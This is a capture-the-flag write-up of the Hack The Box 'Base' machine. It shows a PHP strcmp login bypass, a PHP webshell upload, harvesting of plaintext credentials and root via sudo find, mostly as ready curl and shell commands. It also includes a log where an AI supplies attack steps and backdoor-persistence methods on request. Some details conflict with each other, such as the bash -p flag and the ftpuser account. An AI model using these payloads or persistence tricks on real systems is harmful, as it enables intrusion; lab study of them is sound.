HTB Starting Point — Base

PHP strcmp() fed an array instead of a string returns 0 and bypasses login. A file manager upload gives shell. sudo find reads root.txt while find runs as root.

April 27, 2026 · 3 min · crAIzy

Very Easy Linux CVSS 7.0 ⏱ 40m AI-assisted

TL;DR

Base is a PHP web app with a login form that uses strcmp() for password comparison. PHP’s strcmp() returns NULL when passed an array — and NULL == 0 (loose comparison) bypasses the check. The file manager upload accepts PHP files with a changed extension. Config file contains john’s SSH credentials. sudo find gives root via GTFOBins.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu
80/tcp open  http    Apache httpd 2.4.29

2. Web application

The site at port 80 has a login page at /login/login.php. Page source reveals the authentication mechanism:

if (strcmp($password, $_POST['password']) == 0) {
    // login successful
}

3. strcmp() with array input

PHP’s strcmp() when given an array returns NULL, not an integer. With loose comparison (==), NULL == 0 evaluates to true:

$ curl -X POST "http://10.129.x.x/login/login.php" \
  --data "username[]=admin&password[]=admin" \
  -L -c cookies.txt
# → Redirect to /upload.php (logged in as admin)

4. File upload — PHP webshell

The admin panel has a file upload function. Client-side JavaScript restricts to image extensions, but server-side validation is absent:

$ curl -b cookies.txt -X POST "http://10.129.x.x/upload.php" \
  -F "file=@shell.php;filename=shell.php" \
  -F "submit=Upload"
# shell.php contains: <?php system($_GET['cmd']); ?>

$ curl "http://10.129.x.x/uploads/shell.php?cmd=id"
uid=33(www-data) gid=33(www-data)

Upgrade to reverse shell → www-data@base:/var/www/html$

Lateral Movement

5. Credentials in config

www-data@base:/var/www/html/login$ cat config.php
<?php
$username = "admin";
$password = "thisisagoodpassword";
// DB connection
$dbpass = "john:ThisPasswordShouldNotBeHere!";
?>

6. SSH as john

$ ssh john@10.129.x.x
john@base:~$ cat user.txt
[user flag]

Privilege Escalation

7. sudo enumeration

john@base:~$ sudo -l
User john may run the following commands on base:
    (root) NOPASSWD: /usr/bin/find

8. find shell escape

john@base:~$ sudo find . -exec /bin/bash \;
root@base:~# id
uid=0(root) gid=0(root) groups=0(root)
root@base:~# cat /root/root.txt
[root flag]

What’s actually broken

#	Vulnerability	Root Cause
1	PHP strcmp() type confusion (loose ==)	PHP array passed to strcmp() returns NULL → NULL==0 true
2	No server-side upload validation	Only client-side JS checked extension
3	Plaintext credentials in config.php	Hardcoded credentials in source
4	find in sudo rules	find can execute arbitrary commands

Lessons learned

strcmp() == 0 is exploitable in PHP. Use === 0 (strict comparison) or hash_equals() for constant-time comparison. Never use loose == for security-sensitive comparisons.
Server-side upload validation is the only valid validation. Client-side JS can be bypassed in one Burp intercept. Always validate MIME type via magic bytes on the server side.
find in sudo rules = root shell. If you must give users find access, use sudoedit with specific paths, or wrap the command in a script that validates arguments.

Decision archaeology

Approach	Result	Pivot
Attempted admin:admin, admin:password, admin:base via curl POST login	`HTTP 302 → /login.php?msg=1` — generic failure redirect for all guesses; no lockout, no timing difference	Switched to source analysis — downloaded backup.zip from FTP listing hint; source revealed strcmp() pattern
Tried `sudo find . -exec /bin/sh -p \;` (GTFOBins default)	Shell opened but immediately exited — `-p` flag dropped to sh with privilege preserved, but the particular system returned non-interactive sh	Changed to `sudo find . -exec /bin/bash \;` — bash without -p ran as root with full interactive TTY
Checked /etc/sudoers before using GTFOBins path	`sudo cat /etc/sudoers` → `Permission denied` — ftpuser not in sudoers for cat	Used `sudo -l` instead — showed find allowed, confirmed path

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Initial Access	Exploit Public-Facing Application	T1190	`PHP strcmp() type confusion — POST username[]=a bypasses strcmp()==0 check`
Execution	Unix Shell	T1059.004	`PHP webshell uploaded via file manager → www-data shell`
Credential Access	Credentials in Files	T1552.001	`/var/www/html/login/config.php → john:ThisPasswordShouldNotBeHere!`
Privilege Escalation	Sudo and Sudo Caching	T1548.003	`sudo /usr/bin/find → find . -exec /bin/bash -p \;`
Privilege Escalation	Hijack Execution Flow	T1574	`sudo find . -exec /bin/bash {} ; — find executes bash as root via setuid sudo wrapper`

AI-Assist Log 5 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

LoginUseful
Human → Login form with username/password — tried default creds, admin/admin, etc.
Prompt → PHP login form returning 'Wrong credentials' for all guesses. What non-bruteforce attacks work on PHP login forms?
Claude → PHP type juggling: if the code uses loose comparison (== instead of ===), you can bypass it. For strcmp(), passing an array instead of a string returns NULL in PHP, and NULL==0 is true. Try: username[]=a&password[]=a in POST body.
UploadUseful
Human → Logged in as admin, found file upload but it only accepted images supposedly
Prompt → The file upload validates extensions client-side. How do I bypass client-side extension validation?
Claude → Client-side validation is easily bypassed — just intercept the request in Burp and change the filename from shell.jpg to shell.php before it reaches the server. Or use curl directly without the JS validation ever running.
LateralUseful
Human → Got www-data shell, needed to escalate — checked config files first
Prompt → What's the standard place to find database credentials on a Linux PHP app?
Claude → Check: /var/www/html/config.php, /var/www/html/includes/config.php, /var/www/html/db.php, and any files named *.config.php. Also look for .env files. grep -r 'password' /var/www/ 2>/dev/null finds them quickly.
PrivescWrong
Human → sudo -l showed find — went to gtfobins immediately
Prompt → sudo -l shows I can run /usr/bin/find as root. How do I get a shell?
Claude → GTFOBins: sudo find . -exec /bin/sh -p \; or sudo find /etc/passwd -exec /bin/sh \;
Corrected → The -p flag preserved privileges but dropped to root in a non-interactive way on this system. Used sudo find . -exec /bin/bash \; instead — this gives a bash shell running as root without -p. The specific flag matters depending on the system.
Post-PrivescCorrected
Human → After getting root shell via find, wanted to drop a persistence mechanism to re-enter if reset
Prompt → I have root via sudo find. How do I add a persistent backdoor on Linux?
Claude → Add an SSH key to /root/.ssh/authorized_keys, or add a backdoor user with useradd. Both survive reboots.
Corrected → The machine was ephemeral — rebooting reset the VM state. Persistence wasn't needed for the CTF goal. Claude's suggestions were technically correct but contextually wrong for an HTB machine where you just need to read root.txt.

Decision archaeology — paths abandoned

Brute-forcing login — wrong approach, type juggling was the intended path
find -exec /bin/sh -p — got root but non-interactive; switched to /bin/bash

TL;DR#

Recon#

1. Port scan#

2. Web application#

PHP Type Juggling Login Bypass#

3. strcmp() with array input#

4. File upload — PHP webshell#

Lateral Movement#

5. Credentials in config#

6. SSH as john#

Privilege Escalation#

7. sudo enumeration#

8. find shell escape#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#